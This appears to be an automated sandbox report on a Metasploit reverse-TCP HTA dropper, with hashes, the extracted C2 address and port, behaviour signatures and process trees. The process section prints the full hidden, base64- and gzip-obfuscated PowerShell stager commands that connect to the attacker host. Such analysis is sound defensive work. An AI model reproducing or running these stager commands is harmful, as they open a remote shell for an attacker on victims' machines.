Analysis

  • max time kernel
    139s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-05-2024 04:34

General

  • Target

    reverse_tcp.hta

  • Size

    7KB

  • MD5

    4e99f0feadde2839ac462ed6916bfd07

  • SHA1

    1830781cc5f224a68b64bc96d93f10b59b7122b7

  • SHA256

    8022b173111766352a7a3c42480505eba6391a170950505a9d539a9fcf4f2ab3

  • SHA512

    a189491fcacfc9eaecb1c31d706f77b3b6d96ab0d0079e60e7b01bdcba67b0a7b0ebf415e708276212875d479847b00ee2a7aaf40865dc73b3cda64a83d8dd1e

  • SSDEEP

    192:8n2jh1hqT2dcgE65MfDnQ8BQb1STDaIsF6hd9d:8n2jh1hsYsXQehT+Mhd9d

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

1.14.247.162:40001

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\reverse_tcp.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:60
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBFAFAAMQAyAFUAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAewAxAH0AWABxACcAJwArACcAJwBuAC8AdwBhAHEAUQBiAEsAcwBFAG0ANQBjADIAVABhAFIASwB0ADgAWQBCAG4AQQBRAEMAYwBZAEEAQQBoADAANABiAGUANwBHADMAVwBYAHUASgB2AFEANgBoAHYAZgA3ADMAbQA4AFYAMgBTAEsALwBKAFgAZQA2AGsAVwBrAHIAWQBsADUAbgBaADIAVwBlAGUAbQBkAGwAVgBGAG4AdQBDADgAbABqAFoATwBzAHEAMwB0ADIAewAxAH0AVQA0AGgAdgBpAEIARQBlAEsAVgByAGsALwB4ADEAVwBsAEUAdAAnACcAKwAnACcAcgA2AGYAcQB1AHkAVAByAG4AeQBXAGQARQBXAGEATAAyADIAZQBZAFIAcAB2AEQAdwB7ADEAfQBiAG0AJwAnACsAJwAnAGQASgBRAG0ASwBSAHoAMgB0AGQASQBsAEMAYQBrAHUAaQBHAFUAWgBKAHEAdQB2AEsAbgBNAGcAMQBKAFEAZwA0AHUAYgByADQAUQBUAHkAagBmAGwATQBvAGYAdABTADcAagBOADUAZwBWAFkAdABzADIAOQBrAEsAaQBIAEsARABZAGwAMwB2AG4AMwBNAFAAUwBxAFoAcQA3AFoAbABSAG8ANgB1AHsAMQB9AC8AcQAvAHIAaQBvAEwANgBzAG4AZAB4AGwAbQBLAFcAYQA2AG0ANQBUAFEAYQBLAGEAegA1AGkAcQBLADkAOQAxACcAJwArACcAJwBlAGUARABWAGQAawAwADAAdABVAHsAMQB9ADkAaABLAGQAOABKAFcAcABUAEcAagBjAGIAdABYAEcAYwA0AGgAVQBaAGcATABWADcAMABpAGMAaQA1AEgANgBxAHcAbAAzADIAdAAwAG0ASQB5AEoASgA0AGQAeQBsAHAASgBaAGYAUgBWAEIAZwBPAEUAewAxAH0ANABoADMAMAA5AEkAbQBxAHAAVgBaAFMASAB0AEwANQBiAEwAMwA3AFIARgBjAGYAaABsAEYAZwBzAGEAawBaAG8AVABDADUATAB3AHQAVQB1AFMAZQB7ADEAfQBxAFIAdABOAGIARABzAGMALwBJAEoAVgBrAHQAUQBjAHMAVgBDAFkAMgBEAHAAYQA2AEQAMgBEADIALwBKAFYAbwBsAHoAaABpACcAJwArACcAJwByAEsAdgAvAEYAagAnACcAKwAnACcARABZAGcAbQB4AEsANgAxAHkAcABwAFQANQBWAEEAYQBpAGcAUwB2AFEAcgB4AC8AUABtAGEAZgBlADUAbgBqAE8AUwBLADYAagBOAHsAMQB9AFMAZwByAG8AOABPAFUAMABBAE8AeQB7ADEAfQBTAC8AaABXAEoAVwAxAHUAdQAnACcAKwAnACcAdgBXAHoAWgA0AGkAegBYAHkAaQAvAHgAVwA2AEgAZwBMAC8AYQBrAEsAZAAwAHAALwB4AFoATQBhAHQASwBIADQANwBHAGcAaQBkAGIAbQBGAGEAdQBrAG8AegBvAHkAMABlADAAbABVAHIAUwB7ADEAfQB6AEMAUABxADYAOAAxAFYAeQA5ADEAUQBmAE0AdQBoAEkAWABGAGgARgBOAC8AdQBWAGYALwBJAGYAYQBWAHMASABrAFMAMgBGAEwAcQBaAFMAcgBiAFoARQBWACcAJwArACcAJwBqAFkAbQA5AGoASABGAEcAdgBaAEsAdgAyAFgARQBqAEkAaQBwAEUAZABKAHIAVgBTAGIAQQBBAE8AYQBtAHEAeABRAFgAeQBiAE0AQgBKAGcASQBWAEcAVwB6AFAAaABKADcAUwBTAGkANABsAEgAWAB5AGkAagB6AFMAWQBJADgAQwBHAHMASwBYAGsASABFADkAUgB7ADEAfQBkAHkAUQBPAG4AcQAnACcAKwAnACcAVQA3AGMASgB4AEgAQQBsADgAewAxAH0AQgBxAHAAVQBWADUAQQBnAHAAcABZAHUAOAAyAEoAYQBuAHkAegBrAEkAcQBXADIARwAwADcAUwAnACcAKwAnACcAcQBEAEQATgBJAFUAcQB7ADEAfQBxAHUAQQBRAHoANABsAGMAVgBGAEsAZQAwADIARQBLAFoANABMAHUAaAB1AG4AZQAzAG4AegBGAEIAUABaAHkASwAwAHQAeABTAC8AegB1AGUAeABiAGwAdABIAHEAYwBpAHkAVAB5AEkATABHAEIAdwA1AGEANgBKAFIAegBHAFQAawBGAFMAVgBIAHYAVwBKAHQAWABWAHAAVQBKADYAdgBQAGcAdABJAEcAegBNAEcAMgBRAE8AVwA3AGkARQBnAHMAQwBLAEIAYwBJAFgAawBTAHcASwB1ADUAdAB6AFEAYQB5ADQAUgBUAHIAUgBtAEoAQQAnACcAKwAnACcASwBoAFgAZABuAG8ATQBCAHgAQQBrAFMAaQBTAFoATQBjAHcASABCAEIAZgBmAGMAbgBWAE0AaAB0ACcAJwArACcAJwB5ADYAawB0AHcAUwBsAFMAZQBPAEEAbwBSAGQAeABrAFgAVgBXAFYAQwBFAHcARgBWAFMAQQBKADkARgAvADQALwBMADMANAB1AFAANwBrADcANwBZAFEAVQBFAGQATABLAFIARgB0AFkAVwB5AEUAegBvAGUASQAvAFMASwBJAFcASQBPADAAZwBTAFEAVABBADAAVQBsADQAWgBPAEcAVQBmAEcAegBsAHAAVQBaADcAWgAxAHoAUQBJAFkASgB2AFoAdgBmAGMAdQBTAFAAYwBQAHYAegBaAFQAcwB4AG8AMwBSAG4AYgBoAC8ANwBaAEsAUgBmAGIATQA3AHQAbgA5AEwAMQAyAE8AdQB4ADIAUABpAEcANgBDAFQAYgBlAHAAdwBIAHkALwBGAE8AZgBIAEwAbQBUAGwAbgBCAFAASABOAEUAZQBvAHQANgBJAG0AbABZAHIAOQBDAHoAegBDAHMAWgBqAFIAegBoAGQAUgA4AHcAYwAxAEwAcwBLAFAAVwBZAE8AdwBZAFkANwBTADAAMgA2ADYAVQAzADcAbgBtADEAOQAzAFQAUgBTAG8ARwB1AHIAMQBiAHMAMgBVAGIAUABaAHUAbQBpAGEAdAA0AEQAZQBqAE4AYQBEAFcAewAxAH0AUQBQAEkAcgBwADUATwBJAGMAeAAxAE4AJwAnACsAJwAnAFMATABjADgAdABKAEwAZABOAGgASgA2AGYAdAB5ADUAdABwAG8AegBPAGYAcwBwADcAUgA2AG8AUwByAEsAVQAvAGQAagB6AFAAYgBNAEkAdwBqAEgAOQB2ADkATABVAEkAVwA5ADUAdgA5ADcAWABYADkAawBsAC8AMQB2AE0AaABxAHgAZAB3ADQAYQByAGQAdQAwAFEAbAAnACcAKwAnACcAQwA3AGYAaABrADAAcgBIADQAMgBjAHgASwAwAE4AQwBZADQARwBEAE4AMABlAGkAdwB5AGEATwBnAGoAVQA0AGYATABFAHIAbQBvADMASABIAEcAbwAwADYARgBoAHAAMwB2ADkAegBaAFIAMABaAGcASABFADIAdgBjAFcAaABOAEoAdwAwADYAWAAxADkAZgBoAGoARAB2AGIASABxAGoATQA4AE4AcwBPAFQANwA1AHkAdQBjAGIAQQBLADcATABFAFEANAB1AFEAUwBaAG8ATgA3AHgAdwBCAFQATAAyAGUAMgBTADkASAAvAEMAMABnAFcAOAB0AGoAaQB5AFEANgBjAHoAdgBVAEQAZQBjAHIAVAB0AEQAQgB2AHQAWAA0AHcAWgBIAEUAegBhADQAeAB1AGgAOAB2AHUAMABZAFIAbgAwADIAYgBLAEcAZQB5AGEAZgBkAEEASQAxAEEASABBAGYAVwBDAEsAUAAwADMAdgA1AHEARwAvAFcASgB6AC8AMwBwAGgAOABGAHMAWgBVAHkAdQAyAGEARgBoAHQAMABmAEQAOABGAHIAZQAyAFYAaABIADgAdgB7ADEAfQBtAFoANQA5ADUAOAAvAHIARwB1AHoAagA4AGQARAA2AGwAawA0AGkAagBzAFcARgBNADMAZwBFAGwARgBtAE0AYQBpADIAWgBqAFcAYwBrADIAWABWAGsAOQAzADcANgBwAFAASABRAG4ANAB5AGYATQBlAEsAawB6ADkASABHAFMAaABwAGcAQgBZADYARABtAGwAOABuAGIANABVAG0AbgBLAE8AUgBEAFQAcQAnACcAKwAnACcAVwBHAHAAcwBFADcANABKACcAJwArACcAJwBZAGsATQBXAEgAUQBQAGEARwAvAGwAbgBSAEgAagBIAEYAUAB0AHAAQgBkAHcAWQBmADIAbABUAGMAVgAyAGUAUABHAHoAcwA2AG4ANQAwAGEANgA4AGkAaQBvADcAMwB0AEwAdQBYAFIAOABQAEEAYwBmAEkAWQBYADgAaAA5AG8ANQBpAFEATQBSAFYAcwAyAEgAcABtAGwAQwBVAHoAQQBmAHoATgBZAHUAVQBWADUALwByAHoAWgBmAGIAegBVAHcAVgBaAFYATgBaAFEAZABMAGIAcABuAHQATABJAE0AeAB1AGwASQAwADcAVgBmAGoAQgBLADgARwBBAGUAWAByAFoAYQBSAGUAQQBnADEATwB2AG8AVgBhAEEAewAxAH0AVQB2AHoAMwA4AEoAbgBjAFUANQBlAHcAcABjAGMAYQAnACcAKwAnACcAdABIAEYAdQB4AHgAQQA4AEQAcQBjAE8AMgBGAGYAQwA5AEkAYwBvAEQANgBBAGIAbABUAEsAawBMADIAMAA2AGYAOQB1AFgASQB6AHUAZgB7ADEAfQBWAGQAQwBsAEsAVwBBAGcALwAvAHIALwBSACcAJwArACcAJwBaAGIALwAyAEQANwB1AHYAbwBwAEIAWgB6AGEASAA1AGEAZgBuAEgAaABTAGMATgA0AEoAYwBCAE0ATQBWAFUAZwBKAHcATAAnACcAKwAnACcAdABaAGkAUgAvAEkAbgB3AFAAQQA1AEYAaABqAHkASgBMAG8AUQBHAEUAbQBCAFYAZgBQAEwAWgBmAEoARwBKAGcAdwBFADgAeABIAGIATgA0AEMAOABYAEQAbwBXAFMAcQB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwArACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2916
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMEP12UCA7VWbW/aSBD{1}Xq'+'n/waqQbKsEm5c2TaRKt8YBnAQCcYAAh04be7G3WXuJvQ6hvf73m8V2SK/JXe6kWkrYl5nZ2WeemdlVFnuC8ljZOsq3t2{1}U4hviBEeKVrk/x1WlEt'+'r6fquyTrnyWdEWaL22eYRpvDw{1}bm'+'dJQmKRz2tdIlCakuiGUZJquvKnMg1JQg4ubr4QTyjflMoftS7jN5gVYts29kKiHKDYl3vn3MPSqZq7ZlRo6u{1}/q/rioL6sndxlmKWa6m5TQaKaz5iqK991'+'eeDVdk00tU{1}9hKd8JWpTGjcbtXGc4hUZgLV70ici5H6qwl32t0mIyJJ4dylpJZfRVBgOE{1}4h309ImqpVZSHtL5bL37RFcfhlFgsakZoTC5LwtUuSe{1}qRtNbDsc/IJVktQcsVCY2Dpa6D2D2/JVolzhi'+'rKv/Fj'+'DYgmxK61yppT5VAaigSvQrx/Pmafe5njOSK6jN{1}Sgro8OU0AOy{1}S/hWJW1uu'+'vWzZ4izXyi/xW6HgL/akKd0p/xZMatKH47GgidbmFaukozoy0e0lUrS{1}zCPq681Vy91QfMuhIXFhFN/uVf/IfaVsHkS2FLqZSrbZEV'+'jYm9jHFGvZKv2XEjIipEdJrVSbAAOamqxQXybMBJgIVGWzPhJ7SSi4lHXyijzSYI8CGsKXkHE9R{1}dyQOnq'+'U7cJxHAl8{1}BqpUV5AgppYu82JanyzkIqW2G07S'+'qDDNIUq{1}quAQz4lcVFKe02EKZ4Luhune3nzFBPZyK0txS/zuexbltHqciyTyILGBw5a6JRzGTkFSVHvWJtXVpUJ6vPgtIGzMG2QOW7iEgsCKBcIXkSwKu5tzQay4RTrRmJA'+'KhXdnoMBxAkSiSZMcwHBBffcnVMht'+'y6ktwSlSeOAoRdxkXVWVCEwFVSAJ9F/4/L34uP7k77YQUEdLKRFtYWyEzoeI/SKIWIO0gSQTA0Ul4ZOGUfGzlpUZ7Z1zQIYJvZvfcuSPcPvzZTsxo3Rnbh/7ZKRfbM7tn9L12Oux2PiG6CTbepwHy/FOfHLmTlnBPHNEeot6ImlYr9CzzCsZjRzhdR8wc1LsKPWYOwYY7S0266U37nm193TRSoGur1bs2UbPZumiat4DejNaDW{1}QPIrp5OIcx1N'+'SLc8tJLdNhJ6fty5tpozOfsp7R6oSrKU/djzPbMIwjH9v9LUIW95v97XX9kl/1vMhqxdw4ardu0Ql'+'C7fhk0rH42cxK0NCY4GDN0eiwyaOgjU4fLErmo3HHGo06Fhp3v9zZR0ZgHE2vcWhNJw06X19fhjDvbHqjM8NsOT75yucbAK7LEQ4uQSZoN7xwBTL2e2S9H/C0gW8tjiyQ6czvUDecrTtDBvtX4wZHEza4xuh8vu0YRn02bKGeyafdAI1AHAfWCKP03v5qG/WJz/3ph8FsZUyu2aFht0fD8Fre2VhH8v{1}mZ5958/rGuzj8dD6lk4ijsWFM3gElFmMai2ZjWck2XVk9376pPHQn4yfMeKkz9HGShpgBY6Dml8nb4UmnKORDTq'+'WGpsE74J'+'YkMWHQPaG/lnRHjHFPtpBdwYf2lTcV2ePGzs6n50a68iio73tLuXR8PAcfIYX8h9o5iQMRVs2HpmlCUzAfzNYuUV5/rzZfbzUwVZVNZQdLbpntLIMxulI07VfjBK8GAeXrZaReAg1OvoVaA{1}Uvz38JncU5ewpcca'+'tHFuxxA8DqcO2FfC9IcoD6AblTKkL206f9uXIzuf{1}VdClKWAg//r/R'+'Zb/2D7uvopBZzaH5afnHhScN4JcBMMVUgJwL'+'tZiR/InwPA5FhjyJLoQGEmBVfPLZfJGJgwE8xHbN4C8XDoWSqwsAAA{0}{0}')-f'=','+')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1744

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    1KB

    MD5

    4280e36a29fa31c01e4d8b2ba726a0d8

    SHA1

    c485c2c9ce0a99747b18d899b71dfa9a64dabe32

    SHA256

    e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

    SHA512

    494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    16KB

    MD5

    df04acfa3e979c62b0f42805cf02df24

    SHA1

    1ecefe5a387f6389e42b50d56e36eaeaa6de43d6

    SHA256

    05c1660cedfbcb3f1da8def1220e01270ab65c7e380ee3de8a4518bbc7f22f3c

    SHA512

    8a637886189dbef8ea6e173fa1624d98a3f14281dc25e2550306fdd10d689ff8b9574f95bf4f88c7e602c3185c1e728844be182569f40329ef194adbdd88204f

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vodo3xo0.1qj.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1744-36-0x00000000060E0000-0x00000000060E1000-memory.dmp
    Filesize

    4KB

  • memory/2916-4-0x0000000074820000-0x0000000074FD0000-memory.dmp
    Filesize

    7.7MB

  • memory/2916-19-0x0000000006700000-0x000000000674C000-memory.dmp
    Filesize

    304KB

  • memory/2916-6-0x0000000005880000-0x00000000058E6000-memory.dmp
    Filesize

    408KB

  • memory/2916-7-0x0000000005F30000-0x0000000005F96000-memory.dmp
    Filesize

    408KB

  • memory/2916-0-0x000000007482E000-0x000000007482F000-memory.dmp
    Filesize

    4KB

  • memory/2916-13-0x0000000006060000-0x00000000063B4000-memory.dmp
    Filesize

    3.3MB

  • memory/2916-18-0x00000000066E0000-0x00000000066FE000-memory.dmp
    Filesize

    120KB

  • memory/2916-5-0x00000000057E0000-0x0000000005802000-memory.dmp
    Filesize

    136KB

  • memory/2916-20-0x0000000007FE0000-0x000000000865A000-memory.dmp
    Filesize

    6.5MB

  • memory/2916-21-0x0000000006BD0000-0x0000000006BEA000-memory.dmp
    Filesize

    104KB

  • memory/2916-25-0x0000000074820000-0x0000000074FD0000-memory.dmp
    Filesize

    7.7MB

  • memory/2916-2-0x0000000005900000-0x0000000005F28000-memory.dmp
    Filesize

    6.2MB

  • memory/2916-3-0x0000000074820000-0x0000000074FD0000-memory.dmp
    Filesize

    7.7MB

  • memory/2916-1-0x00000000030F0000-0x0000000003126000-memory.dmp
    Filesize

    216KB